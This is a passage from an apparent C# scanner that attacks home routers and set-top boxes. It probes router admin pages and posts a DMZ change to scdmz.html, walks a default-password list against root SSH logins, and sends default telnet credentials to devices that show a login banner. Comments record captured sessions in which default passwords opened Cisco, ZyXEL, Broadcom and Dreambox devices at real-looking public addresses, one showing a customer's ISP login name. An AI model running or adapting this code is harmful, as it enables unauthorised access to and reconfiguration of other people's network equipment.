  712. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
  713. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
  714.  
  715. request.Method = "GET";
  716. //request.ContentType = "application/xml";
  717.  
  718. response = (HttpWebResponse)request.GetResponse();
  719. SR = new StreamReader(response.GetResponseStream());
  720. ResponseText = SR.ReadToEnd();
  721.  
  722. Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
  723. Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
  724. Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
  725. //***********************************************************************************************************************************************
  726. //http://41.250.9.119/scdmz.html //DMZ
  // The only non-GET request: the same address value is sent in the query string and in the body.
  727. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2"); //dmzAddr
  728. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
  729.  
  730. request.Method = "POST";
  731. //request.ContentType = "application/xml";
  732.  
  733. string postData = "address=192.168.1.2";
  734. byte[] byteArray = Encoding.UTF8.GetBytes(postData);
  735. request.ContentLength = byteArray.Length;
  736.  
  737. Stream dataStream = request.GetRequestStream();
  738. dataStream.Write(byteArray, 0, byteArray.Length);
  739. dataStream.Close();
  740.  
  741. response = (HttpWebResponse)request.GetResponse();
  742. SR = new StreamReader(response.GetResponseStream());
  743. ResponseText = SR.ReadToEnd();
  744.  
  745. Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
  746. Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
  747. Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
  748.  
  749.  
  750. }
  751.  
  // Normal end of the probe: release this thread's slot in the shared counter.
  752. cpt_th.Decrementer();
  753.  
  754. //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
  755. }
  // Every failure is treated the same way: the slot is released and nothing is reported.
  756. catch (Exception e)
  757. {
  758. /*
  759. Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
  760. if (scan_en_cours != null) scan_en_cours(this, info);
  761. */
  762. cpt_th.Decrementer();
  763. // Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
  764. // Console.WriteLine("EXCEPT: " + e);
  765. }
  766. }
  767. }
  768.  
  // Candidate passwords that sshtry walks in list order, always with the user name "root".
  // The list mixes short numeric strings, keyboard runs, device or ISP names (the author tags
  // "epicrouter" as Conexant telnet) and entries from the published "passwords you should not
  // use" list linked below; it also contains the empty string.
  // Hardening reading of this list: an Internet-reachable SSH or Telnet service whose account
  // still accepts any of these values is exposed to this kind of guessing, so factory passwords
  // must be changed at provisioning and password login for root disabled where the device allows.
  769. static List<string> passwords = new List<string>
  770. {
  771. "admin",
  772. "1234",
  773. "cisco",
  774. "",
  775. "Admin",
  776. "root",
  777. "toor",
  778. "default",
  779. "azerty",
  780. "qwerty",
  781. "12345",
  782. "123456",
  783. "1234567",
  784. "12345678",
  785. "dreambox",
  786. "test",
  787. "user",
  788. "demo",
  789. "ZXDSL",
  790. "password",
  791. "agadir",
  792. "menara",
  793. "Menara",
  794. "maroc",
  795. "vodafone",
  796. "epicrouter", //conexant telnet
  797. //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
  798. "abc123",
  799. "monkey",
  800. "letmein",
  801. "trustno1",
  802. "dragon",
  803. "baseball",
  804. "111111",
  805. "iloveyou",
  806. "master",
  807. "sunshine",
  808. "ashley",
  809. "bailey",
  810. "passw0rd",
  811. "shadow",
  812. "123123",
  813. "654321",
  814. "superman",
  815. "qazwsx",
  816. "michael",
  817. "football"
  818. //123123
  819. };
  820.  
  /// <summary>
  /// Tries an SSH password login as "root" against <paramref name="myip"/> once for every entry
  /// of the passwords list, using Tamir.SharpSsh's SshStream. A constructor call that does not
  /// throw is reported as a valid password, the negotiated cipher/MAC and version strings are
  /// printed, and the session is closed without sending any command. The loop then continues
  /// with the next password.
  /// </summary>
  /// <param name="myip">Host passed to the SshStream constructor.</param>
  /// <remarks>
  /// Within the visible part of the file the only call to this method is commented out (in the
  /// port 22 branch of Scanner_IP_Port).
  /// On the target side this is one new SSH connection per list entry from the same source, all
  /// for user "root", in quick succession. That burst of failed root authentications is what
  /// sshd logs, rate limiting and lockout tooling would see; key-only authentication or disabled
  /// root password login makes every attempt fail.
  /// A thrown exception whose Message is exactly "Auth fail" is reported as a wrong password;
  /// any other exception is printed as an SSH error.
  /// </remarks>
  821. public static void sshtry(string myip)
  822. {
  823. Console.WriteLine("sshtry");
  824. // sshtry("test");
  825. foreach (string password in passwords)
  826. {
  827. try
  828. {
  829. Console.Write("-Connecting...");
  // Connection and password authentication happen inside this constructor; it throws on failure.
  830. SshStream ssh = new SshStream(myip, "root", password);
  831. Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
  832. Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
  833. Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
  834. Console.WriteLine("-Use the 'exit' command to disconnect.");
  835. Console.WriteLine();
  836.  
  837. //Sets the end of response character
  838. ssh.Prompt = "#";
  839. //Remove terminal emulation characters
  840. ssh.RemoveTerminalEmulationCharacters = true;
  841.  
  842. //Reads the initial response from the SSH stream
  843. // Console.Write(ssh.ReadResponse());
  844.  
  845.  
  846.  
  847. ////Send commands from the user
  848. //while (true)
  849. //{
  850. // string command = Console.ReadLine();
  851. // if (command.ToLower().Equals("exit"))
  852. // break;
  853.  
  854. // //Write command to the SSH stream
  855. // ssh.Write(command);
  856. // //Read response from the SSH stream
  857. // Console.Write(ssh.ReadResponse());
  858. //}
  859. ssh.Close(); //Close the connection
  860. Console.WriteLine("Connection closed.");
  861. }
  862. catch (Exception e)
  863. {
  864. string response = string.Empty;
  865. response = e.Message;
  // Exact string comparison on the exception message decides "wrong password" versus "other error".
  866. if (response == "Auth fail")
  867. {
  868. Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
  869. // sshtry("12345");
  870. }
  871. else
  872. {
  873. Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
  874. }
  875. }
  876. }
  877. }
  878.  
  879. public static void telnettry(string myip, string banner)
  880. {
  881. Console.WriteLine("telnettry");
  882.  
  883. Socket Sock_scan;
  884.  
  885. byte[] data = new byte[1024];
  886. string stringdata="";
  887. int recv;
  888.  
  889. //try
  890. //{
  891.  
  892. IPAddress adresseIP = IPAddress.Parse(myip);
  893. IPEndPoint ip = new IPEndPoint(adresseIP, 23);
  894. // Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  895. //Sock_scan.Blocking = false; // This is a non blocking IO
  896.  
  897. /*
  898. // Assign Callback function to read from Asyncronous Socket
  899. callbackProc = new AsyncCallback(ConnectCallback);
  900. // Begin Asyncronous Connection
  901. Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
  902. */
  903.  
  904. // Sock_scan.Connect(ip);
  905. //recv = Sock_scan.Receive(data);
  906. //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
  907.  
  908. //}
  909. //catch (Exception eeeee)
  910. //{
  911. // Console.WriteLine(eeeee.Message);
  912. //}
  913.  
  914. String strRetPage = null;
  915. Int32 bytes;
  916. Byte[] RecvBytes = new Byte[256];
  917. Encoding ASCII = Encoding.ASCII;
  918. /*
  919. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  920.  
  921. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
  922.  
  923. while (bytes > 0)
  924. {
  925. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  926. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
  927. }
  928. Console.WriteLine("Banner telnet: " + strRetPage);
  929. */
  930.  
  931. if (banner.Contains("ogin:") || banner.Contains("sername:"))
  932. {
  933. Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  934. Sock_scan.Connect(ip);
  935.  
  936. recv = Sock_scan.Receive(data);
  937. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  938. Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);
  939.  
  940. #region BANNERS01
  941. //Exemple: Vulcan
  942. //<BAD SEQUENCE>
  943. //Copyright (c) 2001-2003 by Conexant, Inc.
  944.  
  945. //login: 01
  946. //password:
  947. //Echec Login
  948. //login:
  949. //login: 02
  950. //password:
  951. //Echec Login
  952. //login: 03
  953. //password:
  954. //Echec Login
  955. //login:
  956. //login: 04
  957. //password:
  958. //Echec Login
  959. //login: 05
  960. //password:
  961. //Echec Login
  962.  
  963.  
  964. //Perte de la connexion à l'hôte.
  965. //</BAD SEQUENCE>
  966.  
  967. //************************************************************************************
  968. // CONEXANT SYSTEMS, INC.
  969. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  970.  
  971. //LOGON PASSWORD>
  972. //(epicrouter)
  973. //
  974. //
  975. // CONEXANT SYSTEMS, INC.
  976. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  977.  
  978.  
  979. // MAIN MENU
  980.  
  981. // 0. Select VC Adaptor
  982. // 1. Display Firmware Version
  983. // 2. Password Setup
  984. // 3. Connection Status
  985. // 4. Network Setup
  986. // 5. ADSL Setup
  987. // 6. System Maintenance
  988.  
  989.  
  990.  
  991.  
  992. // S. Save Settings and Reset Unit
  993. // R. Reset Without Saving Changes
  994. // Q. Quit Session
  995.  
  996. // Enter your selection below:
  997.  
  998. //>>>
  999. //(2)
  1000. // CONEXANT SYSTEMS, INC.
  1001. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  1002.  
  1003. // Password Setup
  1004.  
  1005.  
  1006. // 1. Change Administrative Password
  1007. // 2. Change PPP User Name and Password
  1008. // 3. Change User Password
  1009.  
  1010.  
  1011.  
  1012.  
  1013.  
  1014.  
  1015.  
  1016.  
  1017. // Press 'B' to go Back
  1018. // Press 'M' to go to Main Menu
  1019. // Enter your selection below
  1020.  
  1021.  
  1022.  
  1023. //>>>
  1024.  
  1025. //(1)
  1026. // CONEXANT SYSTEMS, INC.
  1027. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  1028.  
  1029. // Change Administrative Password
  1030.  
  1031.  
  1032. // Enter New Admin Password:
  1033. // (no less than 8 characters, '&' is not accepted)
  1034. // (Press ESC to quit)
  1035.  
  1036. //>>>
  1037. //
  1038. // CONEXANT SYSTEMS, INC.
  1039. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  1040.  
  1041. // Confirm Administrative Password
  1042.  
  1043.  
  1044. // Re-enter New Admin Password:
  1045. // (no less than 8 characters, '&' is not accepted)
  1046. // (Press ESC to quit)
  1047.  
  1048. //>>>
  1049.  
  1050. // CONEXANT SYSTEMS, INC.
  1051. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  1052.  
  1053. // Password Setup
  1054.  
  1055.  
  1056. // 1. Change Administrative Password
  1057. // 2. Change PPP User Name and Password
  1058. // 3. Change User Password
  1059.  
  1060. // Press 'B' to go Back
  1061. // Press 'M' to go to Main Menu
  1062. // Enter your selection below
  1063.  
  1064.  
  1065.  
  1066. //>>>
  1067.  
  1068.  
  1069. // CONEXANT SYSTEMS, INC.
  1070. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
  1071.  
  1072. // Quit Session
  1073.  
  1074.  
  1075. // This will quit current telnet session.
  1076.  
  1077.  
  1078. // Press 'Y' to continue, or 'B' to go back.
  1079. // Press 'M' for main menu.
  1080.  
  1081.  
  1082. //>>>
  1083.  
  1084.  
  1085.  
  1086. //************************************************************************************
  1087. //NetDVRDVS:admin
  1088. //Password:
  1089. //Login incorrect
  1090.  
  1091.  
  1092. //************************************************************************************
  1093. //User Access Verification
  1094.  
  1095. //Username: admin
  1096. //Password:
  1097. //% Login invalid
  1098.  
  1099.  
  1100. //************************************************************************************
  1101. //(212.217.28.244)
  1102. //User Access Verification
  1103.  
  1104. //Password: 1234
  1105. //GPBM>help
  1106. //Help may be requested at any point in a command by entering
  1107. //a question mark '?'. If nothing matches, the help list will
  1108. //be empty and you must backup until entering a '?' shows the
  1109. //available options.
  1110. //Two styles of help are provided:
  1111. //1. Full help is available when you are ready to enter a
  1112. // command argument (e.g. 'show ?') and describes each possible
  1113. // argument.
  1114. //2. Partial help is provided when an abbreviated argument is entered
  1115. // and you want to know what arguments match the input
  1116. // (e.g. 'show pr?'.)
  1117.  
  1118. //GPBM>
  1119. //GPBM>?
  1120. //Exec commands:
  1121. // <1-99> Session number to resume
  1122. // access-enable Create a temporary Access-List entry
  1123. // access-profile Apply user-profile to interface
  1124. // clear Reset functions
  1125. // connect Open a terminal connection
  1126. // disable Turn off privileged commands
  1127. // disconnect Disconnect an existing network connection
  1128. // enable Turn on privileged commands
  1129. // exit Exit from the EXEC
  1130. // help Description of the interactive help system
  1131. // lock Lock the terminal
  1132. // login Log in as a particular user
  1133. // logout Exit from the EXEC
  1134. // name-connection Name an existing network connection
  1135. // pad Open a X.29 PAD connection
  1136. // ping Send echo messages
  1137. // ppp Start IETF Point-to-Point Protocol (PPP)
  1138. // resume Resume an active network connection
  1139. // rlogin Open an rlogin connection
  1140. // set Set system parameter (not config)
  1141. // show Show running system information
  1142. // slip Start Serial-line IP (SLIP)
  1143. // systat Display information about terminal lines
  1144. // telnet Open a telnet connection
  1145. // terminal Set terminal line parameters
  1146. // traceroute Trace route to destination
  1147. // tunnel Open a tunnel connection
  1148. // where List active connections
  1149. // x28 Become an X.28 PAD
  1150. // x3 Set X.3 parameters on PAD
  1151.  
  1152. //GPBM>
  1153.  
  1154. //GPBM>ping 8.8.8.8
  1155.  
  1156. //Type escape sequence to abort.
  1157. //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
  1158. //!!!!!
  1159. //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
  1160. //GPBM>
  1161.  
  1162. //GPBM>show ?
  1163. //backup Backup status
  1164. //c1700 Show c1700 information
  1165. //cca CCA information
  1166. //cdapi CDAPI information
  1167. //class-map Show QoS Class Map
  1168. //clock Display the system clock
  1169. //compress Show compression statistics
  1170. //dialer Dialer parameters and statistics
  1171. //exception exception informations
  1172. //flash: display information about flash: file system
  1173.  
  1174. //history Display the session command history
  1175. //hosts IP domain-name, lookup style, nameservers, and host table
  1176. //isdn ISDN information
  1177. //location Display the system location
  1178. //modemcap Show Modem Capabilities database
  1179. //policy-map Show QoS Policy Map
  1180. //ppp PPP parameters and statistics
  1181. //queue Show queue contents
  1182. //queueing Show queueing configuration
  1183. //radius Shows radius information
  1184. //rmon rmon statistics
  1185. //rtr Response Time Reporter (RTR)
  1186. //sessions Information about Telnet connections
  1187. //snmp snmp statistics
  1188. //tacacs Shows tacacs+ server statistics
  1189. //template Template information
  1190. //terminal Display terminal configuration parameters
  1191. //traffic-shape traffic rate shaping configuration
  1192. //users Display information about terminal lines
  1193. //version System hardware and software status
  1194.  
  1195. //GPBM>show version
  1196. //Cisco Internetwork Operating System Software
  1197. //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
  1198. //Copyright (c) 1986-2000 by cisco Systems, Inc.
  1199. //Compiled Tue 14-Mar-00 16:40 by cmong
  1200. //Image text-base: 0x80008088, data-base: 0x805B7EE0
  1201.  
  1202. //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
  1203.  
  1204. //GPBM uptime is 5 weeks, 6 days, 45 minutes
  1205. //System returned to ROM by power-on
  1206. //System image file is "flash:c1700-y-mz.121-1"
  1207.  
  1208. //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
  1209. //.
  1210. //Processor board ID JAD04180989 (362865562), with hardware revision 0000
  1211. //M860 processor: part number 0, mask 32
  1212. //Bridging software.
  1213. //X.25 software, Version 3.0.0.
  1214. //Basic Rate ISDN software, Version 1.1.
  1215. //1 FastEthernet/IEEE 802.3 interface(s)
  1216. //1 Serial(sync/async) network interface(s)
  1217. //1 ISDN Basic Rate interface(s)
  1218. //32K bytes of non-volatile configuration memory.
  1219. //4096K bytes of processor board System flash (Read/Write)
  1220.  
  1221. //Configuration register is 0x2102
  1222.  
  1223. //GPBM>show diag
  1224. //Slot 0:
  1225. // C1720 1FE Mainboard Port adapter, 3 ports
  1226. // Port adapter is analyzed
  1227. // Port adapter insertion time unknown
  1228. // EEPROM contents at hardware discovery:
  1229. // Hardware Revision : 5.1
  1230. // PCB Serial Number : JAD04180989
  1231. // Part Number : 73-3201-05
  1232. // Board Revision : 70
  1233. // Fab Version : 04
  1234. // EEPROM format version 4
  1235. // EEPROM contents (hex):
  1236. // 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
  1237. // 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
  1238. // 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1239. // 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1240. // 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1241. // 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1242. // 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1243. // 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
  1244.  
  1245. // WIC Slot 0:
  1246. // Serial 1T WAN daughter card
  1247. // Hardware revision 1.0 Board revision H0
  1248. // Serial number 0018074153 Part number 800-01514-01
  1249. // Test history 0x00 RMA number 00-00-00
  1250. // Connector type WAN Module
  1251. // EEPROM format version 1
  1252. // EEPROM contents (hex):
  1253. // 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
  1254. // 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
  1255.  
  1256. // WIC Slot 1:
  1257. // BRI S/T - 2186 WAN daughter card
  1258. // Hardware revision 1.3 Board revision A0
  1259. // Serial number 0019915070 Part number 800-01833-03
  1260. // Test history 0x00 RMA number 00-00-00
  1261. // Connector type WAN Module
  1262. // EEPROM format version 1
  1263. // EEPROM contents (hex):
  1264. // 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
  1265. // 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
  1266.  
  1267.  
  1268.  
  1269.  
  1270. //************************************************************************************
  1271. //-----------------------------------------------------------------------
  1272. //Cisco Router and Security Device Manager (SDM) is installed on this device.
  1273. //This feature requires the one-time use of the username "cisco"
  1274. //with the password "cisco". The default username and password have a privilege le
  1275. //vel of 15.
  1276.  
  1277. //Please change these publicly known initial credentials using SDM or the IOS CLI.
  1278.  
  1279. //Here are the Cisco IOS commands.
  1280.  
  1281. //username <myuser> privilege 15 secret 0 <mypassword>
  1282. //no username cisco
  1283.  
  1284. //Replace <myuser> and <mypassword> with the username and password you want to use
  1285. //.
  1286.  
  1287. //For more information about SDM please follow the instructions in the QUICK START
  1288.  
  1289. //GUIDE for your router or go to http://www.cisco.com/go/sdm
  1290. //-----------------------------------------------------------------------
  1291.  
  1292.  
  1293. //User Access Verification
  1294.  
  1295. //Username: cisco
  1296. //Password:
  1297. //% Login invalid
  1298.  
  1299.  
  1300. //************************************************************************************
  1301. //BCM96338 ADSL Router
  1302. //Login: bad
  1303. //Password:
  1304. //Login incorrect. Try again.
  1305. //Login: admin
  1306. //Password: password
  1307.  
  1308. //Note: If you have problem with Backspace key, please make sure you configure you
  1309. //r terminal emulator settings. For instance, from HyperTerminal you would need to
  1310. // use File->Properties->Setting->Back Space key sends.
  1311.  
  1312.  
  1313. // Main Menu
  1314.  
  1315. //1. ADSL Link State
  1316. //2. LAN
  1317. //3. WAN
  1318. //4. DNS Server
  1319. //5. Route Setup
  1320. //6. NAT
  1321. //7. Firewall
  1322. //8. Quality Of Service
  1323. //9. Management
  1324. //10. Passwords
  1325. //11. Diag
  1326. //12. Reset to Default
  1327. //13. Save and Reboot
  1328. //14. Exit
  1329. // ->
  1330.  
  1331. //(10)
  1332.  
  1333. //Note: If you have problem with Backspace key, please make sure you configure you
  1334. //r terminal emulator settings. For instance, from HyperTerminal you would need to
  1335. // use File->Properties->Setting->Back Space key sends.
  1336.  
  1337.  
  1338. // Password Menu
  1339.  
  1340. //1. Admin
  1341. //2. User
  1342. //3. Support
  1343. //4. Exit
  1344. ///Passwords ->
  1345.  
  1346. //Note: If you have problem with Backspace key, please make sure you configure you
  1347. //r terminal emulator settings. For instance, from HyperTerminal you would need to
  1348. // use File->Properties->Setting->Back Space key sends.
  1349.  
  1350.  
  1351. // Password Menu
  1352.  
  1353. //1. Admin
  1354. //2. User
  1355. //3. Support
  1356. //4. Exit
  1357. ///Passwords -> 1
  1358.  
  1359. // Password Configuration Menu For User admin
  1360.  
  1361. //Note: Maximum length of password is 16 characters.
  1362. //Old password :
  1363. //New password :
  1364. //Confirm new password:
  1365. //Password for admin changed successfully.
  1366.  
  1367. //Hit <enter> to continue
  1368.  
  1369.  
  1370. //Note: If you have problem with Backspace key, please make sure you configure you
  1371. //r terminal emulator settings. For instance, from HyperTerminal you would need to
  1372. // use File->Properties->Setting->Back Space key sends.
  1373.  
  1374.  
  1375. // DNS Menu
  1376.  
  1377. //1. Configure
  1378. //2. Show
  1379. //3. Exit
  1380. /// DNS Server -> 2
  1381.  
  1382. //Automatic assigned IP address for DNS is enabled.
  1383. //Primary DNS : 62.251.229.237
  1384. //Secondary DNS: 62.251.229.223
  1385.  
  1386. //Hit <enter> to continue
  1387.  
  1388.  
  1389. //14. Exit
  1390. // -> 14
  1391.  
  1392. //Bye bye. Have a nice day!!!
  1393.  
  1394.  
  1395. //Perte de la connexion à l'hôte.
  1396.  
  1397.  
  1398. //************************************************************************************
  1399. //Password: 1234
  1400. // Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
  1401.  
  1402. // Prestige 650R-E1 Main Menu
  1403. // Prestige 645 Main Menu
  1404.  
  1405. //Getting Started Advanced Management
  1406. // 1. General Setup 21. Filter Set Configuration
  1407. // 3. LAN Setup 22. SNMP Configuration
  1408. // 4. Internet Access Setup 23. System Password
  1409. // 24. System Maintenance
  1410. //Advanced Applications 25. IP Routing Policy Setup
  1411. // 11. Remote Node Setup 26. Schedule Setup
  1412. // 12. Static Routing Setup
  1413. // 15. NAT Setup
  1414. // 99. Exit
  1415.  
  1416.  
  1417.  
  1418.  
  1419.  
  1420.  
  1421. // Enter Menu Selection Number:
  1422.  
  1423. //(23)
  1424. //
  1425.  
  1426. // Menu 23 - System Password
  1427.  
  1428. //Old Password= ?
  1429. //New Password= ?
  1430. //Retype to confirm= ?
  1431.  
  1432.  
  1433.  
  1434.  
  1435.  
  1436.  
  1437.  
  1438.  
  1439.  
  1440.  
  1441.  
  1442.  
  1443.  
  1444. // Enter here to CONFIRM or ESC to CANCEL:
  1445.  
  1446.  
  1447.  
  1448. //
  1449.  
  1450. // Menu 4 - Internet Access Setup
  1451.  
  1452. //ISP's Name= MyISP
  1453. //Encapsulation= PPPoE
  1454. //Multiplexing= LLC-based
  1455. //VPI #= 8
  1456. //VCI #= 35
  1457. //ATM QoS Type= UBR
  1458. // Peak Cell Rate (PCR)= 0
  1459. // Sustain Cell Rate (SCR)= 0
  1460. // Maximum Burst Size (MBS)= 0
  1461. //My Login= saidi_im
  1462. //My Password= ********
  1463. //Idle Timeout (sec)= 0
  1464. //IP Address Assignment= Dynamic
  1465. // IP Address= N/A
  1466. //Network Address Translation= SUA Only
  1467. // Address Mapping Set= N/A
  1468.  
  1469. //Press ENTER to Confirm or ESC to Cancel:
  1470.  
  1471.  
  1472. //************************************************************************************
  1473. //Password: 1234
  1474.  
  1475. // Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
  1476.  
  1477. // Prestige 660HW-61 Main Menu
  1478.  
  1479. //Getting Started Advanced Management
  1480. // 1. General Setup 21. Filter Set Configuration
  1481. // 2. WAN Backup Setup 22. SNMP Configuration
  1482. // 3. LAN Setup 23. System Security
  1483. // 4. Internet Access Setup 24. System Maintenance
  1484. // 25. IP Routing Policy Setup
  1485. //Advanced Applications 26. Schedule Setup
  1486. // 11. Remote Node Setup
  1487. // 12. Static Routing Setup
  1488. // 14. Dial-in User Setup 99. Exit
  1489. // 15. NAT Setup
  1490.  
  1491.  
  1492.  
  1493.  
  1494.  
  1495. // Enter Menu Selection Number:
  1496.  
  1497. //(23)
  1498.  
  1499. //
  1500.  
  1501. // Menu 23 - System Security
  1502.  
  1503. //1. Change Password
  1504. //2. RADIUS Server
  1505.  
  1506. //4. IEEE802.1x
  1507.  
  1508. //(1)
  1509. //
  1510. //Menu 23.1 - System Security - Change Password
  1511.  
  1512. // Old Password= ?
  1513. // New Password= ?
  1514. // Retype to confirm= ?
  1515.  
  1516.  
  1517.  
  1518.  
  1519.  
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527.  
  1528. // Enter here to CONFIRM or ESC to CANCEL:
  1529.  
  1530.  
  1531.  
  1532.  
  1533.  
  1534.  
  1535.  
  1536.  
  1537.  
  1538.  
  1539. // Enter Menu Selection Number:
  1540.  
  1541.  
  1542.  
  1543. //************************************************************************************
  1544. //(Cisco router)
  1545. //User Access Verification
  1546.  
  1547. //Username: bad
  1548. //Password:
  1549. //% Login invalid
  1550.  
  1551. //Username: admin
  1552. //Password:
  1553. //% Login invalid
  1554.  
  1555. //Username: admin
  1556. //Password:
  1557. //% Login invalid
  1558.  
  1559.  
  1560. //Perte de la connexion à l'hôte.
  1561.  
  1562.  
  1563. //************************************************************************************
  1564. //**************************
  1565. //* *
  1566. //* The Gemini Project *
  1567. //* *
  1568. //**************************
  1569.  
  1570. //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
  1571.  
  1572. //dreambox login: root
  1573. //Password:
  1574.  
  1575.  
  1576. //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
  1577. //Enter 'help' for a list of built-in commands.
  1578.  
  1579. //root@dreambox:~>
  1580. //root@dreambox:~> help
  1581. //
  1582. //Built-in commands:
  1583. //-------------------
  1584. // . : alias bg break cd chdir command continue eval exec exit export
  1585. // false fg getopts hash help jobs kill let local pwd read readonly
  1586. // return set shift times trap true type ulimit umask unalias unset
  1587. // wait
  1588. //root@dreambox:~> passwd
  1589. //Changing password for root
  1590. //Enter the new password (minimum of 5, maximum of 8 characters)
  1591. //Please use a combination of upper and lower case letters and numbers.
  1592. //Enter new password:
  1593. //Re-enter new password:
  1594. //Password changed.
  1595. //root@dreambox:~>
  1596. //root@dreambox:~>
  1597. //\[ fusermount mkdir start-stop-daemon
  1598. //ash gbox mknod streampes
  1599. //automount gbox.ver mkswap streamripper
  1600. //awk gdaemon mmi.socket streamsec
  1601. //basename gdaemon.socket more streamts
  1602. //boot grep mount stty
  1603. //bunzip2 gunzip mv su
  1604. //busybox gzip nc swapoff
  1605. //bzcat halt netstat swapon
  1606. //cat hdparm nslookup sync
  1607. //chgrp head online.log syslogd
  1608. //chmod hostname passwd tail
  1609. //chown hotplug pid.info tar
  1610. //chroot hotplug.socket pidof telnet
  1611. //clear httpd ping telnetd
  1612. //cp id pmt.tmp test
  1613. //date ifconfig poweroff top
  1614. //dd in.ftpd prockill touch
  1615. //df in.telnetd ps true
  1616. //dmesg inadyn pwd tty
  1617. //dos2unix inetd rdate udhcpc
  1618. //dropbear init reboot udpstreampes
  1619. //dropbearkey insmod reset umount
  1620. //dropbearmulti kill rm uname
  1621. //du killall rmdir uniq
  1622. //dvbnet klogd rmmod unix2dos
  1623. //echo lcdoff route uptime
  1624. //enigma lcdstuff sc.info usleep
  1625. //enigmanet ln sc01.info vi
  1626. //env loadkmap scp wc
  1627. //eraseall logger sed wget
  1628. //etherwake login sh which
  1629. //expr logread showlogo whoami
  1630. //false losetup sleep xargs
  1631. //find ls smbmnt yes
  1632. //flashtool lsmod smbmount zcat
  1633. //free md5sum sort
  1634. //************************************************************************************
  1635.  
  1636. #endregion
  1637.  
  1638. if (banner.Contains("dreambox"))
  1639. {
  1640. //dreambox login:
  1641. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
  1642. recv = Sock_scan.Receive(data);
  1643. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1644. Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
  1645. //Password:
  1646. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
  1647. recv = Sock_scan.Receive(data);
  1648. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1649. Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
  1650. }
  1651. else
  1652. { //Vulcan
  1653. //login:
  1654. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
  1655. recv = Sock_scan.Receive(data);
  1656. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1657. Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
  1658. //password:
  1659. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
  1660. recv = Sock_scan.Receive(data);
